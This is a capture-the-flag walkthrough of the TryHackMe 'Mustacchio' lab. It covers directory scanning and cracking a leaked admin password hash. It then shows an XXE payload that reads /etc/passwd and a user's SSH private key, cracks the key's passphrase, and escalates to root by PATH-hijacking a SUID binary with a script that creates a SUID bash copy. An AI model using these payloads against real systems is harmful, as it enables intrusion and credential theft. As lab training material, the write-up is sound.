THM WriteUP | Mustacchio
Professional pentester, technical writer, telegram channel owner
Intro
Hello ethical hackers! Today we are going to pass the Mustacchio on TryHackMe. This lab has tags: PrivEsc, XXE.
Recon
Scanning
For no need to enter IP again and again. I exported IP like a variable in current bash shell.
export IP=*.*.*.*
Then i scan the host with rustscan.
Okey, we see ssh and two http servers. I suggest you explore them.
Web recon
http://IP/index.html
http://IP:8765/
Cool! We found the admin panel. I try some SQL injections to bypass auth, but it didn't work...
Next i run gobuster to both webs.
Dirsearching
I often use feroxbuster. And i forward correct requests thorough Burpsuite Proxy to view result in site map and Prox -> HTTP History. I advise you to do the same.
feroxbuster -u "http://$IP:8765" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --thorough -A -P 127.0.0.1:8080 -E -R 200,301,302,403,500,502
We found some interesting location.
http://IP/custom/js/
I suggest you analyze this file.
We see the sqlite command to create user. Great! We
admin:1868e36a6d2b17d4c2745f1659433a54d4bc5f4b
Exploitation
Bruteforce sqlite hash with john
john sqlite.hash -w=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt
Nice! We successfully crack the hash.
XXE
After login, you can add comments to the site.
Try to send request and catch them with BurpSuite:
After analyze the response we found two interesting things
Download and cat dontforget.bak
┌──(kali㉿kali)-[~/temp]
└─$ cat /home/kali/Downloads/dontforget.bak
<?xml version="1.0" encoding="UTF-8"?>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>This paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could’ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could’ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
</comment>
Copy this xml to new xml file and change him.
<?xml version="1.0" encoding="UTF-8"?>
<comment>
<name>NAME-TEST</name>
<author>AUTHOR-TEST</author>
<com></com>
</comment>
Okey try to XXE this form:
xml=<?xml+version="1.0"+encoding="UTF-8"?>
<!DOCTYPE+foo+[
+++<!ELEMENT+foo+ANY+>
+++<!ENTITY+xxe+SYSTEM++"file:///etc/passwd"+>]>
<comment>
++<name>NAME-TEST</name>
++<author>AUTHOR-TEST</author>
++<com>&xxe;</com> <--Here we use var that has /etc/passwd inside-->
</comment>
Interesting users:
joe:x:1002:1002::/home/joe:/bin/bash
barry:x:1003:1003::/home/barry:/bin/bash
After we veriefied XXE we can check /home/barry/.ssh/id_rsa. Okey. we need passphrase:
Securing access
Let's crack the id_rsa:
ssh2john id_rsa > id_rsa.hash
john id_rsa.hash -w=/usr/share/wordlists/rockyou.txt
Correct ssh connection:
First flag
barry@mustacchio:~$ ls
user.txt
barry@mustacchio:~$ cat user.txt
******
Privilege Escalation
Analyze home folders files. Nice! We found /home/joe/access_log
strings /home/joe/live_log
Okey, we need to create binary with bash shell. Go to /tmp and create tail
#!/bin/bash
cp /bin/bash /tmp/bash
chmod +s /tmp/bash
Add execute permissions to tail, add /tmp to $PATH using the following command: export PATH=/tmp:$PATH and execute SUID binary live_log. Finally enter bash -p.
